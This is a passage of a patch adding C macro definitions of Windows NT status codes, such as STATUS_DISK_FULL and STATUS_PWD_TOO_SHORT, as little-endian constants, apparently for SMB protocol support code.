++#define STATUS_INVALID_IMAGE_FORMAT cpu_to_le32(0xC000007B)
++#define STATUS_NO_TOKEN cpu_to_le32(0xC000007C)
++#define STATUS_BAD_INHERITANCE_ACL cpu_to_le32(0xC000007D)
++#define STATUS_RANGE_NOT_LOCKED cpu_to_le32(0xC000007E)
++#define STATUS_DISK_FULL cpu_to_le32(0xC000007F)
++#define STATUS_SERVER_DISABLED cpu_to_le32(0xC0000080)
++#define STATUS_SERVER_NOT_DISABLED cpu_to_le32(0xC0000081)
++#define STATUS_TOO_MANY_GUIDS_REQUESTED cpu_to_le32(0xC0000082)
++#define STATUS_GUIDS_EXHAUSTED cpu_to_le32(0xC0000083)
++#define STATUS_INVALID_ID_AUTHORITY cpu_to_le32(0xC0000084)
++#define STATUS_AGENTS_EXHAUSTED cpu_to_le32(0xC0000085)
++#define STATUS_INVALID_VOLUME_LABEL cpu_to_le32(0xC0000086)
++#define STATUS_SECTION_NOT_EXTENDED cpu_to_le32(0xC0000087)
++#define STATUS_NOT_MAPPED_DATA cpu_to_le32(0xC0000088)
++#define STATUS_RESOURCE_DATA_NOT_FOUND cpu_to_le32(0xC0000089)
++#define STATUS_RESOURCE_TYPE_NOT_FOUND cpu_to_le32(0xC000008A)
++#define STATUS_RESOURCE_NAME_NOT_FOUND cpu_to_le32(0xC000008B)
++#define STATUS_ARRAY_BOUNDS_EXCEEDED cpu_to_le32(0xC000008C)
++#define STATUS_FLOAT_DENORMAL_OPERAND cpu_to_le32(0xC000008D)
++#define STATUS_FLOAT_DIVIDE_BY_ZERO cpu_to_le32(0xC000008E)
++#define STATUS_FLOAT_INEXACT_RESULT cpu_to_le32(0xC000008F)
++#define STATUS_FLOAT_INVALID_OPERATION cpu_to_le32(0xC0000090)
++#define STATUS_FLOAT_OVERFLOW cpu_to_le32(0xC0000091)
++#define STATUS_FLOAT_STACK_CHECK cpu_to_le32(0xC0000092)
++#define STATUS_FLOAT_UNDERFLOW cpu_to_le32(0xC0000093)
++#define STATUS_INTEGER_DIVIDE_BY_ZERO cpu_to_le32(0xC0000094)
++#define STATUS_INTEGER_OVERFLOW cpu_to_le32(0xC0000095)
++#define STATUS_PRIVILEGED_INSTRUCTION cpu_to_le32(0xC0000096)
++#define STATUS_TOO_MANY_PAGING_FILES cpu_to_le32(0xC0000097)
++#define STATUS_FILE_INVALID cpu_to_le32(0xC0000098)
++#define STATUS_ALLOTTED_SPACE_EXCEEDED cpu_to_le32(0xC0000099)
++#define STATUS_INSUFFICIENT_RESOURCES cpu_to_le32(0xC000009A)
++#define STATUS_DFS_EXIT_PATH_FOUND cpu_to_le32(0xC000009B)
++#define STATUS_DEVICE_DATA_ERROR cpu_to_le32(0xC000009C)
++#define STATUS_DEVICE_NOT_CONNECTED cpu_to_le32(0xC000009D)
++#define STATUS_DEVICE_POWER_FAILURE cpu_to_le32(0xC000009E)
++#define STATUS_FREE_VM_NOT_AT_BASE cpu_to_le32(0xC000009F)
++#define STATUS_MEMORY_NOT_ALLOCATED cpu_to_le32(0xC00000A0)
++#define STATUS_WORKING_SET_QUOTA cpu_to_le32(0xC00000A1)
++#define STATUS_MEDIA_WRITE_PROTECTED cpu_to_le32(0xC00000A2)
++#define STATUS_DEVICE_NOT_READY cpu_to_le32(0xC00000A3)
++#define STATUS_INVALID_GROUP_ATTRIBUTES cpu_to_le32(0xC00000A4)
++#define STATUS_BAD_IMPERSONATION_LEVEL cpu_to_le32(0xC00000A5)
++#define STATUS_CANT_OPEN_ANONYMOUS cpu_to_le32(0xC00000A6)
++#define STATUS_BAD_VALIDATION_CLASS cpu_to_le32(0xC00000A7)
++#define STATUS_BAD_TOKEN_TYPE cpu_to_le32(0xC00000A8)
++#define STATUS_BAD_MASTER_BOOT_RECORD cpu_to_le32(0xC00000A9)
++#define STATUS_INSTRUCTION_MISALIGNMENT cpu_to_le32(0xC00000AA)
++#define STATUS_INSTANCE_NOT_AVAILABLE cpu_to_le32(0xC00000AB)
++#define STATUS_PIPE_NOT_AVAILABLE cpu_to_le32(0xC00000AC)
++#define STATUS_INVALID_PIPE_STATE cpu_to_le32(0xC00000AD)
++#define STATUS_PIPE_BUSY cpu_to_le32(0xC00000AE)
++#define STATUS_ILLEGAL_FUNCTION cpu_to_le32(0xC00000AF)
++#define STATUS_PIPE_DISCONNECTED cpu_to_le32(0xC00000B0)
++#define STATUS_PIPE_CLOSING cpu_to_le32(0xC00000B1)
++#define STATUS_PIPE_CONNECTED cpu_to_le32(0xC00000B2)
++#define STATUS_PIPE_LISTENING cpu_to_le32(0xC00000B3)
++#define STATUS_INVALID_READ_MODE cpu_to_le32(0xC00000B4)
++#define STATUS_IO_TIMEOUT cpu_to_le32(0xC00000B5)
++#define STATUS_FILE_FORCED_CLOSED cpu_to_le32(0xC00000B6)
++#define STATUS_PROFILING_NOT_STARTED cpu_to_le32(0xC00000B7)
++#define STATUS_PROFILING_NOT_STOPPED cpu_to_le32(0xC00000B8)
++#define STATUS_COULD_NOT_INTERPRET cpu_to_le32(0xC00000B9)
++#define STATUS_FILE_IS_A_DIRECTORY cpu_to_le32(0xC00000BA)
++#define STATUS_NOT_SUPPORTED cpu_to_le32(0xC00000BB)
++#define STATUS_REMOTE_NOT_LISTENING cpu_to_le32(0xC00000BC)
++#define STATUS_DUPLICATE_NAME cpu_to_le32(0xC00000BD)
++#define STATUS_BAD_NETWORK_PATH cpu_to_le32(0xC00000BE)
++#define STATUS_NETWORK_BUSY cpu_to_le32(0xC00000BF)
++#define STATUS_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC00000C0)
++#define STATUS_TOO_MANY_COMMANDS cpu_to_le32(0xC00000C1)
++#define STATUS_ADAPTER_HARDWARE_ERROR cpu_to_le32(0xC00000C2)
++#define STATUS_INVALID_NETWORK_RESPONSE cpu_to_le32(0xC00000C3)
++#define STATUS_UNEXPECTED_NETWORK_ERROR cpu_to_le32(0xC00000C4)
++#define STATUS_BAD_REMOTE_ADAPTER cpu_to_le32(0xC00000C5)
++#define STATUS_PRINT_QUEUE_FULL cpu_to_le32(0xC00000C6)
++#define STATUS_NO_SPOOL_SPACE cpu_to_le32(0xC00000C7)
++#define STATUS_PRINT_CANCELLED cpu_to_le32(0xC00000C8)
++#define STATUS_NETWORK_NAME_DELETED cpu_to_le32(0xC00000C9)
++#define STATUS_NETWORK_ACCESS_DENIED cpu_to_le32(0xC00000CA)
++#define STATUS_BAD_DEVICE_TYPE cpu_to_le32(0xC00000CB)
++#define STATUS_BAD_NETWORK_NAME cpu_to_le32(0xC00000CC)
++#define STATUS_TOO_MANY_NAMES cpu_to_le32(0xC00000CD)
++#define STATUS_TOO_MANY_SESSIONS cpu_to_le32(0xC00000CE)
++#define STATUS_SHARING_PAUSED cpu_to_le32(0xC00000CF)
++#define STATUS_REQUEST_NOT_ACCEPTED cpu_to_le32(0xC00000D0)
++#define STATUS_REDIRECTOR_PAUSED cpu_to_le32(0xC00000D1)
++#define STATUS_NET_WRITE_FAULT cpu_to_le32(0xC00000D2)
++#define STATUS_PROFILING_AT_LIMIT cpu_to_le32(0xC00000D3)
++#define STATUS_NOT_SAME_DEVICE cpu_to_le32(0xC00000D4)
++#define STATUS_FILE_RENAMED cpu_to_le32(0xC00000D5)
++#define STATUS_VIRTUAL_CIRCUIT_CLOSED cpu_to_le32(0xC00000D6)
++#define STATUS_NO_SECURITY_ON_OBJECT cpu_to_le32(0xC00000D7)
++#define STATUS_CANT_WAIT cpu_to_le32(0xC00000D8)
++#define STATUS_PIPE_EMPTY cpu_to_le32(0xC00000D9)
++#define STATUS_CANT_ACCESS_DOMAIN_INFO cpu_to_le32(0xC00000DA)
++#define STATUS_CANT_TERMINATE_SELF cpu_to_le32(0xC00000DB)
++#define STATUS_INVALID_SERVER_STATE cpu_to_le32(0xC00000DC)
++#define STATUS_INVALID_DOMAIN_STATE cpu_to_le32(0xC00000DD)
++#define STATUS_INVALID_DOMAIN_ROLE cpu_to_le32(0xC00000DE)
++#define STATUS_NO_SUCH_DOMAIN cpu_to_le32(0xC00000DF)
++#define STATUS_DOMAIN_EXISTS cpu_to_le32(0xC00000E0)
++#define STATUS_DOMAIN_LIMIT_EXCEEDED cpu_to_le32(0xC00000E1)
++#define STATUS_OPLOCK_NOT_GRANTED cpu_to_le32(0xC00000E2)
++#define STATUS_INVALID_OPLOCK_PROTOCOL cpu_to_le32(0xC00000E3)
++#define STATUS_INTERNAL_DB_CORRUPTION cpu_to_le32(0xC00000E4)
++#define STATUS_INTERNAL_ERROR cpu_to_le32(0xC00000E5)
++#define STATUS_GENERIC_NOT_MAPPED cpu_to_le32(0xC00000E6)
++#define STATUS_BAD_DESCRIPTOR_FORMAT cpu_to_le32(0xC00000E7)
++#define STATUS_INVALID_USER_BUFFER cpu_to_le32(0xC00000E8)
++#define STATUS_UNEXPECTED_IO_ERROR cpu_to_le32(0xC00000E9)
++#define STATUS_UNEXPECTED_MM_CREATE_ERR cpu_to_le32(0xC00000EA)
++#define STATUS_UNEXPECTED_MM_MAP_ERROR cpu_to_le32(0xC00000EB)
++#define STATUS_UNEXPECTED_MM_EXTEND_ERR cpu_to_le32(0xC00000EC)
++#define STATUS_NOT_LOGON_PROCESS cpu_to_le32(0xC00000ED)
++#define STATUS_LOGON_SESSION_EXISTS cpu_to_le32(0xC00000EE)
++#define STATUS_INVALID_PARAMETER_1 cpu_to_le32(0xC00000EF)
++#define STATUS_INVALID_PARAMETER_2 cpu_to_le32(0xC00000F0)
++#define STATUS_INVALID_PARAMETER_3 cpu_to_le32(0xC00000F1)
++#define STATUS_INVALID_PARAMETER_4 cpu_to_le32(0xC00000F2)
++#define STATUS_INVALID_PARAMETER_5 cpu_to_le32(0xC00000F3)
++#define STATUS_INVALID_PARAMETER_6 cpu_to_le32(0xC00000F4)
++#define STATUS_INVALID_PARAMETER_7 cpu_to_le32(0xC00000F5)
++#define STATUS_INVALID_PARAMETER_8 cpu_to_le32(0xC00000F6)
++#define STATUS_INVALID_PARAMETER_9 cpu_to_le32(0xC00000F7)
++#define STATUS_INVALID_PARAMETER_10 cpu_to_le32(0xC00000F8)
++#define STATUS_INVALID_PARAMETER_11 cpu_to_le32(0xC00000F9)
++#define STATUS_INVALID_PARAMETER_12 cpu_to_le32(0xC00000FA)
++#define STATUS_REDIRECTOR_NOT_STARTED cpu_to_le32(0xC00000FB)
++#define STATUS_REDIRECTOR_STARTED cpu_to_le32(0xC00000FC)
++#define STATUS_STACK_OVERFLOW cpu_to_le32(0xC00000FD)
++#define STATUS_NO_SUCH_PACKAGE cpu_to_le32(0xC00000FE)
++#define STATUS_BAD_FUNCTION_TABLE cpu_to_le32(0xC00000FF)
++#define STATUS_VARIABLE_NOT_FOUND cpu_to_le32(0xC0000100)
++#define STATUS_DIRECTORY_NOT_EMPTY cpu_to_le32(0xC0000101)
++#define STATUS_FILE_CORRUPT_ERROR cpu_to_le32(0xC0000102)
++#define STATUS_NOT_A_DIRECTORY cpu_to_le32(0xC0000103)
++#define STATUS_BAD_LOGON_SESSION_STATE cpu_to_le32(0xC0000104)
++#define STATUS_LOGON_SESSION_COLLISION cpu_to_le32(0xC0000105)
++#define STATUS_NAME_TOO_LONG cpu_to_le32(0xC0000106)
++#define STATUS_FILES_OPEN cpu_to_le32(0xC0000107)
++#define STATUS_CONNECTION_IN_USE cpu_to_le32(0xC0000108)
++#define STATUS_MESSAGE_NOT_FOUND cpu_to_le32(0xC0000109)
++#define STATUS_PROCESS_IS_TERMINATING cpu_to_le32(0xC000010A)
++#define STATUS_INVALID_LOGON_TYPE cpu_to_le32(0xC000010B)
++#define STATUS_NO_GUID_TRANSLATION cpu_to_le32(0xC000010C)
++#define STATUS_CANNOT_IMPERSONATE cpu_to_le32(0xC000010D)
++#define STATUS_IMAGE_ALREADY_LOADED cpu_to_le32(0xC000010E)
++#define STATUS_ABIOS_NOT_PRESENT cpu_to_le32(0xC000010F)
++#define STATUS_ABIOS_LID_NOT_EXIST cpu_to_le32(0xC0000110)
++#define STATUS_ABIOS_LID_ALREADY_OWNED cpu_to_le32(0xC0000111)
++#define STATUS_ABIOS_NOT_LID_OWNER cpu_to_le32(0xC0000112)
++#define STATUS_ABIOS_INVALID_COMMAND cpu_to_le32(0xC0000113)
++#define STATUS_ABIOS_INVALID_LID cpu_to_le32(0xC0000114)
++#define STATUS_ABIOS_SELECTOR_NOT_AVAILABLE cpu_to_le32(0xC0000115)
++#define STATUS_ABIOS_INVALID_SELECTOR cpu_to_le32(0xC0000116)
++#define STATUS_NO_LDT cpu_to_le32(0xC0000117)
++#define STATUS_INVALID_LDT_SIZE cpu_to_le32(0xC0000118)
++#define STATUS_INVALID_LDT_OFFSET cpu_to_le32(0xC0000119)
++#define STATUS_INVALID_LDT_DESCRIPTOR cpu_to_le32(0xC000011A)
++#define STATUS_INVALID_IMAGE_NE_FORMAT cpu_to_le32(0xC000011B)
++#define STATUS_RXACT_INVALID_STATE cpu_to_le32(0xC000011C)
++#define STATUS_RXACT_COMMIT_FAILURE cpu_to_le32(0xC000011D)
++#define STATUS_MAPPED_FILE_SIZE_ZERO cpu_to_le32(0xC000011E)
++#define STATUS_TOO_MANY_OPENED_FILES cpu_to_le32(0xC000011F)
++#define STATUS_CANCELLED cpu_to_le32(0xC0000120)
++#define STATUS_CANNOT_DELETE cpu_to_le32(0xC0000121)
++#define STATUS_INVALID_COMPUTER_NAME cpu_to_le32(0xC0000122)
++#define STATUS_FILE_DELETED cpu_to_le32(0xC0000123)
++#define STATUS_SPECIAL_ACCOUNT cpu_to_le32(0xC0000124)
++#define STATUS_SPECIAL_GROUP cpu_to_le32(0xC0000125)
++#define STATUS_SPECIAL_USER cpu_to_le32(0xC0000126)
++#define STATUS_MEMBERS_PRIMARY_GROUP cpu_to_le32(0xC0000127)
++#define STATUS_FILE_CLOSED cpu_to_le32(0xC0000128)
++#define STATUS_TOO_MANY_THREADS cpu_to_le32(0xC0000129)
++#define STATUS_THREAD_NOT_IN_PROCESS cpu_to_le32(0xC000012A)
++#define STATUS_TOKEN_ALREADY_IN_USE cpu_to_le32(0xC000012B)
++#define STATUS_PAGEFILE_QUOTA_EXCEEDED cpu_to_le32(0xC000012C)
++#define STATUS_COMMITMENT_LIMIT cpu_to_le32(0xC000012D)
++#define STATUS_INVALID_IMAGE_LE_FORMAT cpu_to_le32(0xC000012E)
++#define STATUS_INVALID_IMAGE_NOT_MZ cpu_to_le32(0xC000012F)
++#define STATUS_INVALID_IMAGE_PROTECT cpu_to_le32(0xC0000130)
++#define STATUS_INVALID_IMAGE_WIN_16 cpu_to_le32(0xC0000131)
++#define STATUS_LOGON_SERVER_CONFLICT cpu_to_le32(0xC0000132)
++#define STATUS_TIME_DIFFERENCE_AT_DC cpu_to_le32(0xC0000133)
++#define STATUS_SYNCHRONIZATION_REQUIRED cpu_to_le32(0xC0000134)
++#define STATUS_DLL_NOT_FOUND cpu_to_le32(0xC0000135)
++#define STATUS_OPEN_FAILED cpu_to_le32(0xC0000136)
++#define STATUS_IO_PRIVILEGE_FAILED cpu_to_le32(0xC0000137)
++#define STATUS_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000138)
++#define STATUS_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000139)
++#define STATUS_CONTROL_C_EXIT cpu_to_le32(0xC000013A)
++#define STATUS_LOCAL_DISCONNECT cpu_to_le32(0xC000013B)
++#define STATUS_REMOTE_DISCONNECT cpu_to_le32(0xC000013C)
++#define STATUS_REMOTE_RESOURCES cpu_to_le32(0xC000013D)
++#define STATUS_LINK_FAILED cpu_to_le32(0xC000013E)
++#define STATUS_LINK_TIMEOUT cpu_to_le32(0xC000013F)
++#define STATUS_INVALID_CONNECTION cpu_to_le32(0xC0000140)
++#define STATUS_INVALID_ADDRESS cpu_to_le32(0xC0000141)
++#define STATUS_DLL_INIT_FAILED cpu_to_le32(0xC0000142)
++#define STATUS_MISSING_SYSTEMFILE cpu_to_le32(0xC0000143)
++#define STATUS_UNHANDLED_EXCEPTION cpu_to_le32(0xC0000144)
++#define STATUS_APP_INIT_FAILURE cpu_to_le32(0xC0000145)
++#define STATUS_PAGEFILE_CREATE_FAILED cpu_to_le32(0xC0000146)
++#define STATUS_NO_PAGEFILE cpu_to_le32(0xC0000147)
++#define STATUS_INVALID_LEVEL cpu_to_le32(0xC0000148)
++#define STATUS_WRONG_PASSWORD_CORE cpu_to_le32(0xC0000149)
++#define STATUS_ILLEGAL_FLOAT_CONTEXT cpu_to_le32(0xC000014A)
++#define STATUS_PIPE_BROKEN cpu_to_le32(0xC000014B)
++#define STATUS_REGISTRY_CORRUPT cpu_to_le32(0xC000014C)
++#define STATUS_REGISTRY_IO_FAILED cpu_to_le32(0xC000014D)
++#define STATUS_NO_EVENT_PAIR cpu_to_le32(0xC000014E)
++#define STATUS_UNRECOGNIZED_VOLUME cpu_to_le32(0xC000014F)
++#define STATUS_SERIAL_NO_DEVICE_INITED cpu_to_le32(0xC0000150)
++#define STATUS_NO_SUCH_ALIAS cpu_to_le32(0xC0000151)
++#define STATUS_MEMBER_NOT_IN_ALIAS cpu_to_le32(0xC0000152)
++#define STATUS_MEMBER_IN_ALIAS cpu_to_le32(0xC0000153)
++#define STATUS_ALIAS_EXISTS cpu_to_le32(0xC0000154)
++#define STATUS_LOGON_NOT_GRANTED cpu_to_le32(0xC0000155)
++#define STATUS_TOO_MANY_SECRETS cpu_to_le32(0xC0000156)
++#define STATUS_SECRET_TOO_LONG cpu_to_le32(0xC0000157)
++#define STATUS_INTERNAL_DB_ERROR cpu_to_le32(0xC0000158)
++#define STATUS_FULLSCREEN_MODE cpu_to_le32(0xC0000159)
++#define STATUS_TOO_MANY_CONTEXT_IDS cpu_to_le32(0xC000015A)
++#define STATUS_LOGON_TYPE_NOT_GRANTED cpu_to_le32(0xC000015B)
++#define STATUS_NOT_REGISTRY_FILE cpu_to_le32(0xC000015C)
++#define STATUS_NT_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000015D)
++#define STATUS_DOMAIN_CTRLR_CONFIG_ERROR cpu_to_le32(0xC000015E)
++#define STATUS_FT_MISSING_MEMBER cpu_to_le32(0xC000015F)
++#define STATUS_ILL_FORMED_SERVICE_ENTRY cpu_to_le32(0xC0000160)
++#define STATUS_ILLEGAL_CHARACTER cpu_to_le32(0xC0000161)
++#define STATUS_UNMAPPABLE_CHARACTER cpu_to_le32(0xC0000162)
++#define STATUS_UNDEFINED_CHARACTER cpu_to_le32(0xC0000163)
++#define STATUS_FLOPPY_VOLUME cpu_to_le32(0xC0000164)
++#define STATUS_FLOPPY_ID_MARK_NOT_FOUND cpu_to_le32(0xC0000165)
++#define STATUS_FLOPPY_WRONG_CYLINDER cpu_to_le32(0xC0000166)
++#define STATUS_FLOPPY_UNKNOWN_ERROR cpu_to_le32(0xC0000167)
++#define STATUS_FLOPPY_BAD_REGISTERS cpu_to_le32(0xC0000168)
++#define STATUS_DISK_RECALIBRATE_FAILED cpu_to_le32(0xC0000169)
++#define STATUS_DISK_OPERATION_FAILED cpu_to_le32(0xC000016A)
++#define STATUS_DISK_RESET_FAILED cpu_to_le32(0xC000016B)
++#define STATUS_SHARED_IRQ_BUSY cpu_to_le32(0xC000016C)
++#define STATUS_FT_ORPHANING cpu_to_le32(0xC000016D)
++#define STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT cpu_to_le32(0xC000016E)
++#define STATUS_PARTITION_FAILURE cpu_to_le32(0xC0000172)
++#define STATUS_INVALID_BLOCK_LENGTH cpu_to_le32(0xC0000173)
++#define STATUS_DEVICE_NOT_PARTITIONED cpu_to_le32(0xC0000174)
++#define STATUS_UNABLE_TO_LOCK_MEDIA cpu_to_le32(0xC0000175)
++#define STATUS_UNABLE_TO_UNLOAD_MEDIA cpu_to_le32(0xC0000176)
++#define STATUS_EOM_OVERFLOW cpu_to_le32(0xC0000177)
++#define STATUS_NO_MEDIA cpu_to_le32(0xC0000178)
++#define STATUS_NO_SUCH_MEMBER cpu_to_le32(0xC000017A)
++#define STATUS_INVALID_MEMBER cpu_to_le32(0xC000017B)
++#define STATUS_KEY_DELETED cpu_to_le32(0xC000017C)
++#define STATUS_NO_LOG_SPACE cpu_to_le32(0xC000017D)
++#define STATUS_TOO_MANY_SIDS cpu_to_le32(0xC000017E)
++#define STATUS_LM_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000017F)
++#define STATUS_KEY_HAS_CHILDREN cpu_to_le32(0xC0000180)
++#define STATUS_CHILD_MUST_BE_VOLATILE cpu_to_le32(0xC0000181)
++#define STATUS_DEVICE_CONFIGURATION_ERROR cpu_to_le32(0xC0000182)
++#define STATUS_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC0000183)
++#define STATUS_INVALID_DEVICE_STATE cpu_to_le32(0xC0000184)
++#define STATUS_IO_DEVICE_ERROR cpu_to_le32(0xC0000185)
++#define STATUS_DEVICE_PROTOCOL_ERROR cpu_to_le32(0xC0000186)
++#define STATUS_BACKUP_CONTROLLER cpu_to_le32(0xC0000187)
++#define STATUS_LOG_FILE_FULL cpu_to_le32(0xC0000188)
++#define STATUS_TOO_LATE cpu_to_le32(0xC0000189)
++#define STATUS_NO_TRUST_LSA_SECRET cpu_to_le32(0xC000018A)
++#define STATUS_NO_TRUST_SAM_ACCOUNT cpu_to_le32(0xC000018B)
++#define STATUS_TRUSTED_DOMAIN_FAILURE cpu_to_le32(0xC000018C)
++#define STATUS_TRUSTED_RELATIONSHIP_FAILURE cpu_to_le32(0xC000018D)
++#define STATUS_EVENTLOG_FILE_CORRUPT cpu_to_le32(0xC000018E)
++#define STATUS_EVENTLOG_CANT_START cpu_to_le32(0xC000018F)
++#define STATUS_TRUST_FAILURE cpu_to_le32(0xC0000190)
++#define STATUS_MUTANT_LIMIT_EXCEEDED cpu_to_le32(0xC0000191)
++#define STATUS_NETLOGON_NOT_STARTED cpu_to_le32(0xC0000192)
++#define STATUS_ACCOUNT_EXPIRED cpu_to_le32(0xC0000193)
++#define STATUS_POSSIBLE_DEADLOCK cpu_to_le32(0xC0000194)
++#define STATUS_NETWORK_CREDENTIAL_CONFLICT cpu_to_le32(0xC0000195)
++#define STATUS_REMOTE_SESSION_LIMIT cpu_to_le32(0xC0000196)
++#define STATUS_EVENTLOG_FILE_CHANGED cpu_to_le32(0xC0000197)
++#define STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT cpu_to_le32(0xC0000198)
++#define STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT cpu_to_le32(0xC0000199)
++#define STATUS_NOLOGON_SERVER_TRUST_ACCOUNT cpu_to_le32(0xC000019A)
++#define STATUS_DOMAIN_TRUST_INCONSISTENT cpu_to_le32(0xC000019B)
++#define STATUS_FS_DRIVER_REQUIRED cpu_to_le32(0xC000019C)
++#define STATUS_IMAGE_ALREADY_LOADED_AS_DLL cpu_to_le32(0xC000019D)
++#define STATUS_NETWORK_OPEN_RESTRICTION cpu_to_le32(0xC0000201)
++#define STATUS_NO_USER_SESSION_KEY cpu_to_le32(0xC0000202)
++#define STATUS_USER_SESSION_DELETED cpu_to_le32(0xC0000203)
++#define STATUS_RESOURCE_LANG_NOT_FOUND cpu_to_le32(0xC0000204)
++#define STATUS_INSUFF_SERVER_RESOURCES cpu_to_le32(0xC0000205)
++#define STATUS_INVALID_BUFFER_SIZE cpu_to_le32(0xC0000206)
++#define STATUS_INVALID_ADDRESS_COMPONENT cpu_to_le32(0xC0000207)
++#define STATUS_INVALID_ADDRESS_WILDCARD cpu_to_le32(0xC0000208)
++#define STATUS_TOO_MANY_ADDRESSES cpu_to_le32(0xC0000209)
++#define STATUS_ADDRESS_ALREADY_EXISTS cpu_to_le32(0xC000020A)
++#define STATUS_ADDRESS_CLOSED cpu_to_le32(0xC000020B)
++#define STATUS_CONNECTION_DISCONNECTED cpu_to_le32(0xC000020C)
++#define STATUS_CONNECTION_RESET cpu_to_le32(0xC000020D)
++#define STATUS_TOO_MANY_NODES cpu_to_le32(0xC000020E)
++#define STATUS_TRANSACTION_ABORTED cpu_to_le32(0xC000020F)
++#define STATUS_TRANSACTION_TIMED_OUT cpu_to_le32(0xC0000210)
++#define STATUS_TRANSACTION_NO_RELEASE cpu_to_le32(0xC0000211)
++#define STATUS_TRANSACTION_NO_MATCH cpu_to_le32(0xC0000212)
++#define STATUS_TRANSACTION_RESPONDED cpu_to_le32(0xC0000213)
++#define STATUS_TRANSACTION_INVALID_ID cpu_to_le32(0xC0000214)
++#define STATUS_TRANSACTION_INVALID_TYPE cpu_to_le32(0xC0000215)
++#define STATUS_NOT_SERVER_SESSION cpu_to_le32(0xC0000216)
++#define STATUS_NOT_CLIENT_SESSION cpu_to_le32(0xC0000217)
++#define STATUS_CANNOT_LOAD_REGISTRY_FILE cpu_to_le32(0xC0000218)
++#define STATUS_DEBUG_ATTACH_FAILED cpu_to_le32(0xC0000219)
++#define STATUS_SYSTEM_PROCESS_TERMINATED cpu_to_le32(0xC000021A)
++#define STATUS_DATA_NOT_ACCEPTED cpu_to_le32(0xC000021B)
++#define STATUS_NO_BROWSER_SERVERS_FOUND cpu_to_le32(0xC000021C)
++#define STATUS_VDM_HARD_ERROR cpu_to_le32(0xC000021D)
++#define STATUS_DRIVER_CANCEL_TIMEOUT cpu_to_le32(0xC000021E)
++#define STATUS_REPLY_MESSAGE_MISMATCH cpu_to_le32(0xC000021F)
++#define STATUS_MAPPED_ALIGNMENT cpu_to_le32(0xC0000220)
++#define STATUS_IMAGE_CHECKSUM_MISMATCH cpu_to_le32(0xC0000221)
++#define STATUS_LOST_WRITEBEHIND_DATA cpu_to_le32(0xC0000222)
++#define STATUS_CLIENT_SERVER_PARAMETERS_INVALID cpu_to_le32(0xC0000223)
++#define STATUS_PASSWORD_MUST_CHANGE cpu_to_le32(0xC0000224)
++#define STATUS_NOT_FOUND cpu_to_le32(0xC0000225)
++#define STATUS_NOT_TINY_STREAM cpu_to_le32(0xC0000226)
++#define STATUS_RECOVERY_FAILURE cpu_to_le32(0xC0000227)
++#define STATUS_STACK_OVERFLOW_READ cpu_to_le32(0xC0000228)
++#define STATUS_FAIL_CHECK cpu_to_le32(0xC0000229)
++#define STATUS_DUPLICATE_OBJECTID cpu_to_le32(0xC000022A)
++#define STATUS_OBJECTID_EXISTS cpu_to_le32(0xC000022B)
++#define STATUS_CONVERT_TO_LARGE cpu_to_le32(0xC000022C)
++#define STATUS_RETRY cpu_to_le32(0xC000022D)
++#define STATUS_FOUND_OUT_OF_SCOPE cpu_to_le32(0xC000022E)
++#define STATUS_ALLOCATE_BUCKET cpu_to_le32(0xC000022F)
++#define STATUS_PROPSET_NOT_FOUND cpu_to_le32(0xC0000230)
++#define STATUS_MARSHALL_OVERFLOW cpu_to_le32(0xC0000231)
++#define STATUS_INVALID_VARIANT cpu_to_le32(0xC0000232)
++#define STATUS_DOMAIN_CONTROLLER_NOT_FOUND cpu_to_le32(0xC0000233)
++#define STATUS_ACCOUNT_LOCKED_OUT cpu_to_le32(0xC0000234)
++#define STATUS_HANDLE_NOT_CLOSABLE cpu_to_le32(0xC0000235)
++#define STATUS_CONNECTION_REFUSED cpu_to_le32(0xC0000236)
++#define STATUS_GRACEFUL_DISCONNECT cpu_to_le32(0xC0000237)
++#define STATUS_ADDRESS_ALREADY_ASSOCIATED cpu_to_le32(0xC0000238)
++#define STATUS_ADDRESS_NOT_ASSOCIATED cpu_to_le32(0xC0000239)
++#define STATUS_CONNECTION_INVALID cpu_to_le32(0xC000023A)
++#define STATUS_CONNECTION_ACTIVE cpu_to_le32(0xC000023B)
++#define STATUS_NETWORK_UNREACHABLE cpu_to_le32(0xC000023C)
++#define STATUS_HOST_UNREACHABLE cpu_to_le32(0xC000023D)
++#define STATUS_PROTOCOL_UNREACHABLE cpu_to_le32(0xC000023E)
++#define STATUS_PORT_UNREACHABLE cpu_to_le32(0xC000023F)
++#define STATUS_REQUEST_ABORTED cpu_to_le32(0xC0000240)
++#define STATUS_CONNECTION_ABORTED cpu_to_le32(0xC0000241)
++#define STATUS_BAD_COMPRESSION_BUFFER cpu_to_le32(0xC0000242)
++#define STATUS_USER_MAPPED_FILE cpu_to_le32(0xC0000243)
++#define STATUS_AUDIT_FAILED cpu_to_le32(0xC0000244)
++#define STATUS_TIMER_RESOLUTION_NOT_SET cpu_to_le32(0xC0000245)
++#define STATUS_CONNECTION_COUNT_LIMIT cpu_to_le32(0xC0000246)
++#define STATUS_LOGIN_TIME_RESTRICTION cpu_to_le32(0xC0000247)
++#define STATUS_LOGIN_WKSTA_RESTRICTION cpu_to_le32(0xC0000248)
++#define STATUS_IMAGE_MP_UP_MISMATCH cpu_to_le32(0xC0000249)
++#define STATUS_INSUFFICIENT_LOGON_INFO cpu_to_le32(0xC0000250)
++#define STATUS_BAD_DLL_ENTRYPOINT cpu_to_le32(0xC0000251)
++#define STATUS_BAD_SERVICE_ENTRYPOINT cpu_to_le32(0xC0000252)
++#define STATUS_LPC_REPLY_LOST cpu_to_le32(0xC0000253)
++#define STATUS_IP_ADDRESS_CONFLICT1 cpu_to_le32(0xC0000254)
++#define STATUS_IP_ADDRESS_CONFLICT2 cpu_to_le32(0xC0000255)
++#define STATUS_REGISTRY_QUOTA_LIMIT cpu_to_le32(0xC0000256)
++#define STATUS_PATH_NOT_COVERED cpu_to_le32(0xC0000257)
++#define STATUS_NO_CALLBACK_ACTIVE cpu_to_le32(0xC0000258)
++#define STATUS_LICENSE_QUOTA_EXCEEDED cpu_to_le32(0xC0000259)
++#define STATUS_PWD_TOO_SHORT cpu_to_le32(0xC000025A)
++#define STATUS_PWD_TOO_RECENT cpu_to_le32(0xC000025B)
